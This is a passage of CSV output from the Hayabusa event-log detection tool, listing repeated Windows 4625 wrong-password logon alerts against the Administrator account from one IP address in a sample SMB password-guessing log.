NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oJMVh1zdQt7EikVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OqvximSAPlXZ3An | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tr2GQ1F3jccpWrsm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCmbvQXXXzhHOdMG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qTp1BwPv8XiK2mrG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rnb19AXxM5ArcLxX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUS5CKq2W1rkq46d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FzKSUVdsC5eENWDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QFL07Mhy4iw5psBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cMpitnzLXDLSXL73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RSfaPdcsiRQoGYYm | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PJRP4bS9Qgg06Z5P | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3Z4veMNKngHUDoRf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmF0YFgAMSRotb1y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DmrbO3dZw46DgmZQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qg4CMwLpfzLrvDPj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKDKUXNNhuSqRiTE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cBocrjNXjmuPCKRJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: loCrAXibgVxcOtCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZ7pHOJeOExrON2E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MeucKpaodpmdsqhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LRlmBeBlV6n4MQyo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E8FYOF6HxJHqm7GW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9tBtz1GYn5J8sbFH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qn8PlxEzIu9AKUgt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdjqlNDU3U150UAw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esaTfuwuiFAkIVs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y4LbVQ5ytgVCqFmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rWoX76sgYTVwxkD5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQFJRRYn6sjYK5cD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wyVuBGEFGJqImQ7W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pRvnyVGxG8i0e3PQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X6Hv2fj43a8j1O2P | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: myP4zVFyw2qE1SV7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lpmBcVilH72dYF7E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jd9hKGDxLcnZphlL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OmXgOD9kaGJ4PIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BpQtWW0fAEzNH28B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EgNkY8LKSWcnLM00 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z8S1dUwb3HjOnEs9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 49ZKcnswdISJDwbS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qOuYmww71pTM0l3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PUHoGgmXKRJknRZG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6yf8LSkcwBP9s1mN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmH2AMDmkZVbCt8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I23o9EQLpPpn9RlY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MrEVj3DB1prpOtnq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Iau1IHKxWRsqQaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdPC9LVhZS2l27XF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxcofRpjCFme3mg2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e1VnQLbETh1GgX0c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rbdPYXx8mx4SV9G7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hcv3HWid3auIu7cY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5o2OviUvdOmk5HON | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bVBSORhgFwTy2TWO | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DsIhCEZcfYenufvf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xDadVFtE4toNiagy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GnydJjDBdzJWqmWa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GW8im2IhNzrGoSFs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aTzlqq9HLEX6wzdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz98aGXd0fdVzmTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q2zOy64cp6dXelNl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X1BflxNjQRNopjb4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 401ulFeuzCtp5lPF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p0SIzJrzkseFB1j8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cyQMxtEdbud8iJLI | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gbjIqxD4E6fYsGx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rEeZEcj63sBddCsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tiATfqYtrH9LoqR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PG3HB3GqFwQFLdcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: G8NU6WRdrq9DxM6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cvZKIkI2aeBzbwe0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EE7AL3nJ7qsnk4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feu34D0VvoMrnWzo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon 